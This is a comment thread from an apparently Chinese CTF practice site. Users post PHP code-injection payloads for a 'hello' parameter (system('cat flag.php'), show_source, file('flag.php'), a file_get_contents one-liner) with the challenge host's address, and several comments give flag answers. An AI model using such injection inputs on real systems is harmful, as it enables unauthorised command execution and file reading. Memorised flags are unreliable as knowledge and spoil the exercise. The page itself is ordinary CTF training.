评分(9)
解题动态
kfdwty 攻破了该题 18小时前
z791458703 攻破了该题 1天前
buxixi 攻破了该题 1天前
1720713439 攻破了该题 1天前
shbshb123 攻破了该题 1天前
18075013015 攻破了该题 1天前
dkwang 攻破了该题 2天前
Gsparrow 攻破了该题 2天前
wenbojia 攻破了该题 3天前
DOMAKE 攻破了该题 3天前
别偷我后场 攻破了该题 3天前
Ta7suya 攻破了该题 3天前
liyuanchao 攻破了该题 3天前
qweQWERT 攻破了该题 3天前
咔咔 攻破了该题 3天前
lishenyuchen 攻破了该题 3天前
摇曳露营芝麻凛 攻破了该题 3天前
1745085539 攻破了该题 4天前
3287973822 攻破了该题 4天前
评论
wangyihao 1年前
举报
hello=system("cat flag.php")
18092952956 1年前
举报
show_source('flag.php')
BlueL1ght 1年前
举报
system("cat+flag.php")
zhuleixy 1年前
举报
我想的是用sql注入类似的方法,把var_dump注释掉,让其执行后面的代码 http://114.67.175.224:13863/?hello=$SERVER);$fileContent%20=%20file_get_contents(%27/flag%27);echo%20$fileContent;//
15738762315 1年前
举报
flag{6dd6075616f5943ab53cff237ff1a63b}
maoctf 1年前
举报
flag{b97285ef92aa650fa9223aafc7adc646};
哥哥 1年前
举报
http://114.67.175.224:12290//?hello=file('flag.php')
z03ctfer 1年前
举报
?hello=file('flag.php') file函数是把一个文件中的内容读入到一个数组中
马踏黄河两岸 1年前
举报
../?hello=system("ls") 可以看见有flag.php继续命令执行将ls换成cat flag.php
lilifanqian 1年前
举报
flag{4cadd25b49840f0cdb999cdabc86b103}